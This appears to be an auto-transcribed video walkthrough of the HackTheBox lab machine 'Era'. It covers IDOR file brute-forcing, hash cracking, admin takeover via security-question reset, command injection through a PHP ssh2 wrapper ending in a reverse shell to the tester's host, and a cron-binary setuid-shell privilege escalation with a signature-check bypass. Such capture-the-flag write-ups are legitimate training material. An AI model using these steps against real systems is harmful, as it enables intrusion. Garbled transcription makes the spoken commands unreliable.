HackTheBox - Era

What's going on Youtube It's me doing Era from Hack the box. It starts off with finding an FTP web server and two web applications. One of the web applications has a file upload and download functionality, and there's no permission on the download. The only thing you need is the ID, so we brute force the ID and get two other documents the signing keys, which comes in handy for the root step, and also a backup of the website. The backup also has the database, which contains some credentials which we can use against the FTP server to discover a backup of the Apache config and the website. So as code shows, there is some functionality around PHP wrappers. Looking at the Apache backup, we see the PHP extension is installed, so you can use the ssh php wrapper to log into the box and run a command to get a reverse shell. The root step is around signing an Elf binary, but it's easier to show than explain. So let's just jump in. As always, going to rough weather and maps or SC for default scripts as V enumerate versions dash vive for double verbose. This gives us things like the TTL, a output all formats put in the nmap direct and call it error, and then the IP address which is 1010 1179. This can take some time to run. So I've already ran a looking at the results. We have just two ports open. The first one is FTP on port 21 and the banner is via SftP version 305. We also have Http on port 80. It's better says it's engine X running on ubuntu and is directing us over to errors Http. So let's go ahead and make sure this is an authorized file. So sudo v atc host. Then we can add ten 1011 dot 79 error http. Save that and let's see the first thing we could poke at is FTP. I know and maps scripts will do anonymous authentication by default, but it's something I always just like checking. Right. So let's just do FTP 1010 1179 I actually don't have the client on my computer. Let's do sudo apt search FTP and this may pop up a lot of things. Let's see, is there anything that's obvious. FTP is like a client. Let's just try sudo apt install FTP. What's this? Do? Seems fine. So I'm going to install this and hopefully we will be able to just FTP and do server. There we go. I'm going to do anonymous. And it looks like it is going to fail. I know a lot of people they always go to like search point things like that. It's not a bad habit to have, but off top of my head, I know there haven't been many exploits in vs FTP for a very long time. For some reason, a lot of people see this banner and think it's going to be vulnerable because it was a very common vector in Ctfs a long time ago, but that was like version two, three, four. Generally when I see version three, I don't think any exploit and two three, four is released like in 2011, which is like 14 years ago. So I'm not going to spend too much time looking for vulnerabilities. If I ran into a big roadblock, I may go, revisit that idea, but I want to go take a look at the website. So if I go to era dot http, we get a page. If I click around, we got services about portfolio clients, team contact, and the contact page. We do see a domain here. At this point we can run a go busto. We can either look for hidden pages or we could look for, virtual host. Right before we go pages, we should try to identify what type of service this is. If I do index dot HTML, we get the page. If we try like PHP, we get a 4 or 4 not found. So I'm going to guess this is a static website. We could also look at the page source to see if anything sticks out, like things like WordPress, Drupal, things like that. But I don't really see too much here. I'm just going to go and run a go buster, so we'll do a go Buster. Put it in virtual host mode url http. And what was this? Heroku http, the list opsec list, discovery DNS. And I always like just using the sub domains top million. Paste this and I want to say we have to add like a DNS flag or something. We host does this say command options. We do your L I guess we can try this. And let's see it looks like it's working. So we're checking all these sub domains. We don't have a hit. Yeah. And it doesn't look like we'll get one. I remember there being something funky that they changed in the latest version of Go Buster. I think it's this append domain. Flag. We see this is false. Let's just do that again. Let's see. Is there something here? Append domain? Let's see. I think this is what we actually want. So let's add the dash. Dash add flag.

And let's see I think without that it's just trying the board list as the whole virtual host. So we add the append domain. It tries to word list dot the URL. So we get one domain. This is going to be followed that HTB. So without the append domain it was just trying a request against file. We add the append domain changes. Oh let's go try file dot Airbnb. I think that should be default. I don't know why it isn't. Maybe it is in the latest. I haven't updated yet, but, let's go ahead and add this to the host file. So we'll do file dot heroku http. Save this. And let's go take a look at what this page is. So we can do file era http. Let's do http file era http. And we get a page. Welcome to error storage. We have a few URLs. So if we click around everyone goes to a sign in page. And that is log and PHP. So we know we're on a PHP web server. We can also log in with security questions. So we have a username mother's maiden name Pet City. We could try like admin A, B, C and C. If we log in we get user not found. So we can have a way to brute force potential users. So if we do like errors http b, we have to do http. Let's see. Did we have usernames on this. There was a contact. Lancer chat Katherine Mori let's see. There's a support. We could try a few things, if we wanted to. Maybe K Mori as a username a b c user not found. Maybe just try. Katherine a b c but kind of getting to a dead end here. One thing I would also try is seeing if this goes to like a API. There's normally sometimes like massive assignment type vulnerabilities. I may be classifying that wrong, but when you send a request in, if X goes to an API, this is much more likely. This looks like it may be hand PHP just based upon this meaning. There's no framework or anything involved, right? But a lot of times when you use like PHP frameworks, there'll be quote unquote smart ways to handle data. Right? And we're passing in username, answer one, answer to answer three. But maybe the framework will just accept other things. So if we did like ID is equal to one. It may just accept that. And then we get a different error. Probably the security questions are incorrect but we're still getting user not found. So it's not vulnerable to that. But that's also something I always test for is if we can change these parameters around, maybe we don't need to know the username. We just change and say, hey, look at the ID instead. We may get in, but let's go take a look at what else there is. I always like having something go on the background, so I'm going to start a go Buster. I want to try to find hidden PHP script, so we'll do go bus to directory mode. The url http file era http wordlist, opsec list, discovery web content raft small words, dot text. And then I'm going to add the PHP extension. Let's see. I don't know why this failed. It's saying everything is a 200. Is that true? Let's just go turn Burp Suite off. Like this. It looks like every page does actually get treated as a 200. Let's turn Bert back on. I just want to look at this behavior, see the exact request. Intercept on, send it. Repeater. So if we do this, we get a 200 page. There is probably a thing to blacklist the length. Please exclude response length. At this point, I probably actually you just use, like, fluff or something like that, but let's go figure out how to do this and go buster. Let's see dash zl so we can add dash, Excel, paste that length in and there we go. We can start enumerating it. And we have a log in PHP register PHP download. Download is redirecting us to log in. There is a files. So let's go take a look at slash files real quick to see what this looks like. So disable this header. We get a forbidden let's see. Let's try registered PHP. So let's go here Register. And it looks like we can create an account. Now there is one stupid thing about this box.

And it took me a pretty long time to realize what was happening, so I'm just going to say it. But if you register a password with password, it's not going to work because they did some anti like SQL injection things. That is really silly, but it's just filtering out strings and oh are is part of a SQL statement. So if you set the word password and you register an account it will remove that and your password be passwd. But you won't know that. And you'll probably spend hours trying to figure that out. But that was annoying. I think I just put my password as a and that worked. Awesome. So now we're logged into the website that node assigned. Let's see what we can do. We can potentially reset security questions. And oddly enough it's asking me for a username. So I can just probably put any user I want. I'm kind of shocked it is asking the username upload files, manage files. So let's try upload files real quick. Let's just choose something. Readme dot license. That sounds great to upload. And we get this ID. So let's see. We know there was a files. So if we do this files let's put Http there. We just uploaded readme dot. Was it license or MD. What did we actually upload. Refresh this page. Does it tell us what we uploaded? File was not uploaded. Manage read me dot license. So forbidden. Still. So we can't access this file directly. Okay, I was wondering if potentially, if we knew the file name, we could access it, but it does not look like that's the case. We could download it here. If we click this, it gives us a link, and it looks like it's downloading off of, the web server. Right. So we do ID 986 DL is equal to true. And it looks like it gives us that download. Now I'm going to check for like a I think it's I do a vulnerability but we're just going to brute force all these numbers. Right. And the first thing I always like doing here, are we can do an DL issue. That's fine, because true like that. There we go. It says if we need authentication to hit this. So let's just do a curl and paste this in. And we don't get a file. We get a through to read it back. Yeah. Redirecting us to log in I think where is the redirect. Yeah. Log in FTP. So we need to make sure when we force this, we pass in or cookie. And the easiest way to do this is just sending the whole request file to forth. So let's go over to the proxy. We can clear this refresh, get a new one. Go to that tab I'm going to copy to file. And I'm going to say that's not actually what I want. We want this. Yeah. So let's copy the file. And I'm going to say download dot request. And now here we have download dot request. So I'm going to edit this. And then we're just going to put fuzz and the parameter we want to fuzz right. And this has everything with us the PHP session ID the user agent, things like that. Now you could just tell stuff the cookie and then be done with it. But I always like just giving it the whole download request so it looks more like my browser is doing it. Things like this accept and user agent match up. So it just looks a little bit better. If I just passed in the straight cookie, then it would have force default user agent and that would definitely stand out. Maybe, what if like Cloudflare or something would block me? So, best practice. I like just using the, request. So we give it the request of download. And because this is not Https, we have to do request proto Http because it defaults to https. And then the wordlist we're going to do this funky thing. We do the carrot privacy. And this is going to run the command and then treat it as a file. So we'll say let's see. We were at 900 something. So let's just find everything from 0 to 1000. And we want to let's see, we'll do hide words 3161. Filter words. There we go. And we have two ID so for one 5054 we also have 986, 996 was the ID that we uploaded. So there's two files 54 and 150. So let's see if we can download these. So if we know the file ID does it. Let us download. We are still on Burp Suite. So we can just disable that real quick. Looks like we can.

So we have site backup dot zip. Let's save that. And then what was the other one 150 something right. Oh just 150. Awesome. And we got signing dot zip. So let's save both of these and then we'll move download site backup here. And the signing. See. Okay I'm going to make a directory say backup. And then we will unzip it. Site backup. There we go. And it looks like we have all the files. Awesome. There is also a database. So that's going to be where I start. So let's do a, SQL Lite on this. And we can say dot schema. And this will give us the thing. So we have all the files. We have the users. So I'm going to just do select username user password from users. And then we have a list of all the users and passwords. So let's go ahead and save this. And then I'm going to go over to the cracking so we can start cracking this. This is just a box I have on my network. You can run hash code on anything. I would recommend running on the host, not a VM. Because if your own VM, it's going to take a long time to crack anything. But let's do hashes. I'll call it here. I'll paste this in, and then I want to separate the usernames with a colon that looks good. Save it. And let's do dot slash hash. other hashes than the word list will do rock. You run this, it'll probably tell us the hash collides with a few things. Actually, it's going to tell us does it match anything? We have to add the, username flag to tell it. We passed in usernames in this. So here we go. It's telling us it conflicts. And the most common one is probably going to be this B script. I have no idea. Like nothing indicating this is form CMS or e-commerce. I always just try the standard B crypt first. That's maybe 3200 because that's what it's always been. I've never not shown that I had to choose that option. I don't know what software uses the other forms, but this is by far the most common. We get one crack already, that is America. And then we get Mustang. Let's see, how long is this going to take? Looking at it, we are what percent are we probably going to finish by the time I'm done talking? Oh, no, we're nowhere near done. But those two crack right away. I'm just going to end this, and then I'm going to do a show to see how far along or what those, counts went to. So if we do our show, we can see Eric had America and already had Mustang. If we go back to the nmap results, there wasn't any. SSH. We do have FTP, so we can try that real quick. So we've do FTP ten 1011 dot 179 let's see. Do we have anything here? Do I have the wrong IP? That's the first, 79, not 179. Let's try Eric. Permission denied. Okay. Let's try Uri, we get a password, we can try Mustang, and then we get logged in. And there is two files. We have Apache 2. com and PHP eight one. So let's get both of these. It failed to download it, but. PHP eight one conf. Failed to open file. Maybe I have to change the mode. Because I can definitely write in this directory. Make their FTP mod. Let's just make sure my FTP program is not doing something stupid. Let's go to this Uri. Mustang. Let's see. Using binary to transfer files. That should be fine, but everything is. I don't know what the zeros mean. Filter open mode Ascii only support stream. Something's definitely going on here. I think w get supports FTP. I'm just going to try something. Uri Mustang. This slash PHP eight one. Com.

No such file. I think I know what's going on. I think there's a directories. I think I'm an idiot. The zero that is. Yeah. 4096 of the default size for a directory. Directory change. Successful. Well we get them get store. This should download everything. So let's save all this. Let's go into the PHP. Do a dir. And there's a lot of files. Let's see one thing sticks out. We have ssh, SSL zip. So this is all like the shared libraries of PHP. I'm not going to download this all, but we'll take note, that this is not standard. And it is one of those tough things to notice. Maybe we should have started with, like, looking at the source code before going into this, but, it is what it is. Let's see. So this is the Apache config for file errors. HTB nothing special. There. Looking at this. Let's see. One thing I like doing to view this. Let's grab everything that doesn't have a comment. Period. There we go. We can just see that file that looks standard. We can do the same thing with Apache two. Thing, if anything is interesting here. I don't see anything. And let's see, actually. I was wondering. Grep files on this? Nope. When we were getting the file errors to be slash files, remember we got a, Error message for three. Forbidden on everything we tried. I was trying to see if there was any of that configured in this, because that maybe indicate, like there's a access file or something. Then we could go. If we found a file disclosure vulnerability, we could go download that access, potentially get the password, and then that could be reused for something else. But I don't see anything there. So let's now turn our eyes over to the site backup. And looking at the files here. The thing that probably most stands out to me is going to be within the upload or download. If the upload is vulnerable, then, we could potentially upload page files and hit code execution that way. So let's see if header is set to a valid. That should be fine. How are we uploading or how we choosing the file name. Let's see. Target directory is files. Error base name. Check for harmful patterns. So it's looking for a single quote or double quote path extension. Select star from files. Let's see. Add file. Field. I do not see too much that stands out to me. I really just hate reading PHP code. There are so many weird functions here that make this not the most straightforward to read. Move uploaded files up. Name. Temp. Name. Target file. I don't see anything, but also. Let's see. I guess the biggest thing we test for is uploading a file with like a directory traversal, which we should have done before. Let's just try this real quick. So if we go back to upload file, we have Remy license. And I want to intercept this request. Proxy intercept on upload. And what we want to do is put a dot slash here and upload this file. It looks like the download worked. If we go to it. A download is ready.

Looks like we can download the file and let's see. Read me. License. Is this now on the root server? It is not. So it looks like it did not save. Read me license. I'm guessing when it writes a file to slash files, it's going to be like a Uuid or something like that. But I'm not seeing that with a quick glance at the code. If we look at how downloads work, let's see. We have. If deal is equal to true it sets these and then just does read file. And then we have this thing beta currently only available to the admin. And we have this show is equal to true session error. User is equal to one. This is most likely going to be an admin check. And then it's letting us to do this weird thing. We're looking for a colon slash inside of format. And then if it is, we're doing f open on it. So we're going to open the wrapper and then concatenate the file at the end of the wrapper. So it's essentially just looking for a PHP wrapper if we do this. So that would include like the most common would be PHP filter convert base64. This thing that's going be the most common thing it's used for. That's a PHP wrapper. So let's go ahead and see if we can become an admin. Right. If we go back to the database it did tell us all the users. Right. We have this admin underscore this unique name. I'm going to guess this is the admin. So let's go ahead and go back to our account. Let's see we were logged in. We can just click Update Security questions. I'm going to do admin with this unique qualifier. We'll set the question a BC if user exist answers may have been updated. So let's now sign out. We send out successfully. Log in with security questions A, B, c log in. And now we have become an admin. And we can see the two files here. So now what we want to do is test this dream wrapper theory thing right. So I want to do it with a PHP session or not PHP session a like the base64 wrapper. And we'll try to read etsi passwd. So we want to go and grab download PHP and I do 54 as the ID because we need the ID on it. Or the ID needs to be valid. I should say. So we send this here. And then there were some extra parameters it wanted us to add. So we do show is equal to true. So and And what else do we need. Format. So we'll say format is equal to PHP columns. Filter convert dot base64 encode resource is equal to Etsi passwd. And it says opening this and it fails. So what we want to do is probably upload a file called passwd because it's going to add this at the end. If we do an ID that doesn't exist let's just do one. We get like file not exist right. Is it found file not found. Right. So we have to do a valid ID, but we can give it any file name we want. So I'm going to upload a file. We can turn Burp Suite off for a second. And let's just do touch passwd. Go here, upload. Let's do HDB. Passed a bd. Let's upload it. And the ID is 8946. So again the contents of the file doesn't matter. We're just using this ID because it pulls the name from the database and adds it to the very end of our query. Right. So now I'm going to just do a resource is equal to Etsi. And we see. Oh it added files. That is annoying. Files passwd. So maybe we can't use this because it's always going to append files on it. But. That's weird. Let's see. I wonder what would happen if we did.

Let's just try one last thing. Intercept is on upload. Name. Dot slash. Password. So it appends files. Dot slash. Passwd. There's no way this is going to work. But don't know if we don't try. File already exist. So I don't think we can really work around this. And even if we did, we're just reading source code. There are potentially other wrappers, and that's where the FTP came into play. If you looked at all the PHP modules, where's my FTP here? Right. We were in the PHP configuration directory and these are all the PHP modules that are installed, one of them being SC, H2, DSL. And this is not a default one. We also have an FTP module. But if we go to Google I'm going to turn Burp Suite off for this. Let's just Google this file name. And Eshu is a dynamic shared object for the PHP snack. Connection. And this is going to enable the PHP wrapper I believe. Let's see. How do we use this resource types. To. Here we go. So the whole like logic step here would be if we look at this let's see if we can find it real quick right. So we go to download our PHP. We know oh we can do something with wrappers including files. Wasn't really that helpful. So if we look at what other wrappers are involved, maybe if we just click here we have file, http, ftp, php, zlib data glob for whatnot. Right. If I think this is an outdated version of PHP, meaning it's not version like beyond 8. 8. 1. So this would have to be multiple years old. I could probably just upload a jar file and then point the wrapper at the far file and have it execute code. However, that's not really a thing anymore. Now, if this was using like Laravel, WordPress, things like that. There is a good chance we could get code execution, because how you get code execution with this file wrapper nowadays is you have to create an object, and you have to reference that object in the code somewhere. But since this is all just, PHP code, there are no objects we can just magically create. So if we did a grep, let's say class, it would be, this is all HTML, right? We're not creating any PHP classes, which means there's no PHP objects. So far, Deserialization is out of play, right? Expect. I've never seen this one on servers. And to be fair, I've never seen SSH to on servers as well. But we saw that ssh. So file. So this is most likely going to be installed. And if we look at it we can say as each to exact user pass URL and then a command. So let's go see if this can work. So let's go ahead and copy that. And let's see go back here. Go to repeater. And what we want to do. Is this right to exact. And then we had two credentials. Bear with me while I look for this. Uri and Eric, I'm going to try Eric first, and we'll just see if we get any output. So we'll say, Eric, password is America 127 001. And then we do the command we want. So I'm just going to do a ping dash C one for count. And I'm going to paying my box. So ten 1014 eight. And I'm doing pluses for spaces because a space is not URL compliant. You have to use spaces there. Pluses. And now let's do sudo tcpdump dash I tan 0-V icmp. So now we're looking for, pings or ICMP traffic. We do this. It says opening resource ID three and we don't get anything. I'm going to add let's see. Let's do a semicolon like that and we get a ping. So what happened here? We take that out we get nothing.

We add the semicolon. We get something. So what's happening here is again the command is doing that concat. Right. If we go back here it's doing this f open to open the wrapper and then add the file on top of it. Right. So that command. Oh it's telling us right here files passwd. So without that, semicolon. It's just treating this as part of it. So let's get rid of again. Right. This ping is not working because this is not an IP address. So yeah. So now we have a way to get pings working. Let's now do a reverse shell. So I'm going to do bash dash, sea bass, dash ai dev TCP ten 1014 eight 9001 zero and one like that. We need these quotes. Then we also want to euro encode the ampersands of the and signs because those are special characters. And then change the, spaces with pluses. Do this. Okay. And then we also need to end this with a semicolon. So let's now try a and see LVM BNP 9001. Run this and there we go. We have a shell. Awesome. So let's do Python 3-C import pti, spawn bin bash SD, raw minus echo, foreground it and then we can export term as equal to xterm. And now enable us to clear the screen. So the first thing I always check for is just general pseudo rules. So we can do a pseudo L and see Erika may not run pseudo on error. We could also switch to potentially the user. Let's see if he exists. I think the password is Mustang. It looks like it was pseudo L Mustang. You already may not run it either. We could look at the two differences between these. If we look at Yuri, he's not in groups. Eric is in devs. So there is one, special group. We can also look for everything that and, look for other accounts on the bots by doing a grep ach dollar that's going to search for every line that ends in H, and almost every shell like bash XXI h s h. They always end in s h. So that's why I do that. We do that against Etsy passwd. We see there's only two users, Eric and Yuri. Well, three if you want to include root. But let's go see what this dev group can do. So I'm gonna just do a find slash dash group devs and let's hide error messages with that to dev. No. So running this we see there is this op avi directory. So if we go in here let's go pick checks and Leslie we see there is a monitor file and then status dot log. And it looks like we have read right over this file because that is part of groups. And if I cat status dot log it looks like it is just running this. Right. So your a 2004. So maybe every single minute it runs. So what I'm going to do is let's do create a shell. B is not found. That is annoying. Nano dev. That's going to show that as H we can say bin bash. Actually we don't want to show because this is being ran by a cron. Right. So what I'm going to do is copy bin bash over to, temp. And then we can do a own root on this file. And then after that we can say sage mod 4755. That's going to add the set uid bit to this, letting us use this bash program to switch over to the root user so we can save that. And let's now, copy this file over, top of monitor. And we probably should have backed up monitor first. I just forgot to do that, but I think that is good. Right. So this is still having the permissions. We look at it looks like it's going to run our script. Let's see what is the current time. It is 608 retail status dot log. We see an error. The first error is from object copy and this is like object dump. If you ran this on a file, it just dumps all the sectors of a binary.

It's saying the file format is not recognized because it's just a text file. There's no like file segments of this or whatever it's called. And then we get an error message saying executable is not signed. Tampering attempt detected skipping. There are two ways we can process here because how the actual script is doing the detection. Is it being done properly? I'm going to show the intended way first, and then we'll go jump and do the unintended. The intended way is just to create a little file and sign it right. And as part of the FTP we did download signing dot zip. So let's just make the directory sign real quick. And then I'm going to unzip this signing dot zip file. 7ZI forgot to do x to extract. And then we have the x509. Thing to generate the key. And then the actual key itself. And this is going to be the signing key. And it looks like it has the public and private as well. So we have private key and certificate here. So it looks like it has both in this one file. Right. So if we just made it our file and uploaded it the signature would not match. We can do that real quick. Let's do make shall see. Let's see, let's include what is it? The standard IO. Like that. And then let's do it. Main. And let's see we can do set uid zero and we have to set all the effective things. So we'll do set gid set effective uid set. He did. That should be right. So what this does set our user and group to root set or effective root. And then we want to run a system command. So we're just going to do the same thing we did before. Copy bin bash over to temp. We'll call it shell. And then let's do a C-H mod for seven seven. What are 4755I think I did before, I don't know why that's my default, thing or do that. And then when we do it, let's just make sure the owner is root. So root like that. There we go. And that should be good, right? Again, the reason we're doing this, instead of just like System Bash is because we're exporting a cron job. So if we just have this file drop us into a shell. Well, we don't have access to that child because it's being ran by a cron. So we're just going to copy a shell over to the temp directory and then, give it the set UID permission to let us exploit it. So if we do a GKE shell let's call this exploit. I'm going to call it the right name instead of typing it. And let's just do a Python three. Http server. Let's go over here. I think I can just w get right Http ten 1014 eight 8000 exploit. It saved. We move exploit over top of monitor. The permissions not by root anymore or root devs. That should be fine. I probably should have done a copy command, but that is most likely fine. Let's do tail status log. You see, no threats detected. We can do a dash f and we'll get that update in a second. It's probably going to say signature does not match right. So let's google elf sign binary. While that goes on and we see a GitHub repo. So let's go ahead and download this. There we go. Hydrate copy. Can't dump the text signature. It doesn't exist. And then says execute not signed. So if we go here I think I can just make this lib crypto. I don't think we have all the libraries needed. This is gonna be a pain. Hopefully. This works. If not, then we're gonna have to switch to Docker to build this, which I don't like doing. But. We can. Let's see. Can I open shared object file lib crypto S1 one? I bet that's just using a different version of SSL or something. Let's see.

Where is this error coming from? Let's try all this. This could be horrible. I probably. Okay, Let's just go ahead and start using Docker for this. So let's do a docker run and our active will delete this when it's done. And I'm going to mount my current directory inside of mount. And then let's run ubuntu 20. I like always specifying a relatively old version of ubuntu as my first, just because when you, create a binary, if you're running a newer version of libc, it won't run on older versions of libc, but if you have compile it on old versions of libc, it'll work for newer versions of libsyn normally. So now that we're in this container, let's go ahead and follow these instructions real quick. We'll probably want to do a apt update that we can install these apt update. Do this. Shouldn't take too long. Install and I hope this has GCC by default. It does not apt install gcc. There we go. We probably have to do make as well or something. I doubt it's just going to have makefile support, but maybe it does. Once this is done let's go into our mount directory. Type make makefile not found apt install make. It should work. There we go. It has now successfully compiled. Let's see. Do this. What do we call this directory? I think we are in sign. Then what was it? We can copy. Keep Pam over to this. Copy your exploit. Over to this. And we have elf sign. We cannot open it. That's annoying, but we can run it here just fine. I'll sign. There we go. So hash algorithm. I'm just gonna specify sha256 because that's the one that comes off to my mind. And then what was it? Pam. Or do both. And then elf file was exploit. I'm going to call it monitor. I'm doing Quita Pam both because we saw it had both a private and public key in it. Hopefully the program is smart enough to use it. Let's see. Removing. It looks like it's signed. It. Let's go here. Do we have a monitor thing? We do. If I do object dump monitor. Let's see. Is it dash capital D? Let's see. Sign. We'll see if this works. Are we still listening on port 5000? See, I don't think we are. We got to find my shell, though. This is Tcpdump. S-H. Here we go. So, Python three. Dash Http server. And we will do a. Let's do a curl now Http ten 1014 a 8000 monitor. And I'll call this E for now. Or do a CPE e over top of monitor. And there we go. So now we have copied E on top of monitor. And this should be a signed file. If we look at the date what time is it? Oh eight. We probably just missed it. Right. Star start log. We don't have any threats. If I do a ls MTM. Oh, we do have a shell, so it may have actually ran Alice a shell. We have this. It is not set. UID, which is surprising. Right. Yeah. It's just seven, five, five. Did I do like the owner afterwards? Let's take a look at this. Let's say we so see. We do see tone. This is stupid. What I did is I just forgot to put the file here.

So the own command failed. And because it failed, the end and only, proceeds on a success. So that's why I didn't run. So now we have to redo everything so we can just do, DCC. So we'll call it exploit. Still. That is definitely the right one. So we can move exploit into this. And let's see if we can remove, monitor. I'm just making sure this is the right one. So we can see the command we're running. Command temp shell. That looks good. So let's see, what do we want to do now? We need to sign it. So we removed monitor sign. It's now signed. Curl. We have to start the Http server. Copy it. Alice la on temp, and we're waiting for this to become set. UID. If we look at the date, it is 2520, so it's probably going to be about 40s. Right? Most likely. So let's just do a sleep 40. This and I will, resume the video when this is done. Okay, I have mentally counted 40s and it is now done and it's still, not set, you idiot. We should see, like a capital S there. We're definitely screwing something up. I bet it's the, C-H mod command. Let's code. Let's see. Le temp. It is owned by root. Root? Did I not download the file? I'm just noticing. For or for? Curl. Strings. Monitor grep c-h mod. Strings E grep C-H mod. I think I just copy the four for. Yes, I did because this was not in the correct directory. Let's do a curl cp strings monitor grep for c-h mod. This is definitely the right one. We have the C-H own root temp. So in hindsight we don't have to do this because this is already owned by root root. So generally one is not doing anything. If we looked at it and temp. Oh it's already ran. Awesome. So let's just do temp. So. And there we go. The effective UID is root. So now we can just do CD slash root and cat root dot text. So that is one way to do the box. There is a pretty funny unintended because it's not doing signature checking correctly. So let's see I'm going to copy E. Let's just do it to a home directory and say correct dot bin. That should work. So let's run a program called Piece by. So let's do google. com piece by GitHub. And this is going to monitor just like new process that gets done in a box. It's something that's very, very handy to be running. When you do these box and try to exploit cons. Right. So let's go ahead and just get it. Sure. This directory is fine. I don't feel like moving it to a correct one. And let's go to a home directory. We get Http ten 1014 eight 8000 piece by 60 4CH mod plus x on this

not with dub dub. There we go. And if we run this program, we will see the actual cron that gets ran. That is, checking the signature and doing everything right. So it shouldn't take too long. I'm kind of surprised it's taking some time at all. I wonder if it kind of triggers when the file gets, changed. Oh, there we go. Probably. So let's see. Initiate monitoring. We have anything? Let's see. Bash periodic status. So right here it's checking a certificate. I think maybe. I think this is just testing. If the certificate is valid. There's one command that's missing that I saw when I did this, myself. But one of the indications right here is this grep. It's just looking for a string inside of the binary, I think. Oh, not the binary. This is probably going to be the tech section. Let's see if there's any new input. Obj. It did not find it this go about but the error message there's obj copy. It can't dump the section. We're not seeing obj copy being oh there we go. Yeah it gets around. So what it's doing here. It's dumping a section. It's dumping the text signature section. And this is what we used to sign the binary. And it's calling it text sig section dot. Then. And it's doing it out of the monitor binary. And then we look right here I think we're just making sure the certificate, what it dumped is a certificate. And then this grep is just making sure the error ink stream exist and the certificate. At no point do I see it actually doing any validation. The certificate is correct, right? Normally when you sign a binary, the certificate also includes some hash of that file. Essentially that says the certificate is good for this binary. If the binary changes, then the certificate would no longer match. But because it's just using grep here, it doesn't look like it's actually performing the, checker. Right. So let's go ahead and run this command. This object copy I can copy it real quick. Okay. So we can run this. And what that did was it created this text bin right. So let's see. This Elf binary signer exploit is not assigned to binary. So it's wget Http ten 1014 eight 8000 exploit. So this text signature came from the monitor binary. What I'm going to do is use object copy to add a section called text signature. And then we're going to give it the text signature section from the monitor binary. And we're going to add that to exploit. And that is it. So let's do temp shell p. Can I delete temp. So it looks like I can or some. So that doesn't exist anymore. I'm going to copy exploit over AbbVie periodic checks monitor. CP and then la temp. And this is going to exist probably in within 60s. And this is just because the program itself isn't really doing any checking. Right. If we went back to the library where this elf signer is, it does give us code that we can use to create our own thing to test. Right. Or is that dynamic linking generate keys? There should be a way. Remove. Let's say bin utils. Elf sign. Read elf doing this object dump. Let's talking about the layout. Generate keys. This is what I want, I swear I saw something on their page

for validating. What if it's a test case? No. But we can see the show was there. This is from that one binary. But we have to figure out a way to test the valid signature. Because normally when you sign a file, like you're signing it to say, hey, this is how you check the integrity of the file to make sure it hasn't been modified. Obviously, that's not happening. If we look at the, initiate monitoring script, you can see the logic. Or check. So yeah, it checks the organization. It checks an email. But it's not actually checking the signature versus the binary. And this is gonna be awkward. It's pretty much the end of the video. I was really expecting to be able to build something quickly to test the validity of the signature itself. I swear I saw something. We could import a library and see, from this project, and it would give you a function that would test the, signature, but I can't find it. Hello. Look at the issues and things like that. Like, I was like, maybe it was like an issue I had saw or it came across right. But if we look at all the closed issues, it's all end. I want to say this is, maybe that's Chinese, but I can't read any of this. And I went to, like, the, repository. I was like, oh, there's a signer. There's a verify module. Oh, this is all a kernel module. Let's see. Verify module, signer sig. Verify. All this type of stuff appears to be like kernel modules and things like that. So I don't really know, the correct way to do this. It is a very, very niche thing. So I'm not going to spend too much time digging into it. But yeah, that is the video. I guess we found out why, it was so easy to bypass by just taking the signature out of one and putting it on top of another binary, because there's no good way for this library to actually validate it without using the kernel module, which is a thing in itself. So, with that being said, that's. Give me the video, take care of everyone else. See you all next time.